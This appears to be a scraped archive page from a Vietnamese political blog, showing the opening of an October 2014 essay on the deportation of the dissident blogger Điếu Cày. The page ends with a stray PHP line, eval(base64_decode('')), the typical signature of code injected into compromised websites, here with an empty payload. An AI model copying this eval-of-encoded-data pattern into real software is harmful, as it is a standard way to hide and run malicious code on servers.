Archive for October 22nd, 2014

Ánh sáng Điếu Cày

Ánh sáng Điếu Cày

Khi trục xuất anh Điếu Cày ra khỏi Việt Nam, lãnh đạo CS nghĩ họ trục xuất anh sang Mỹ. Với lãnh đạo CS đó là một chọn lựa khôn ngoan. Bởi vì, theo họ, tên anh gắn liền với các phong trào chống chủ nghĩa Đại Hán Bá Quyền Trung Cộng

10.22.2014 | Tiểu Luận- Chính Luận |

3 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>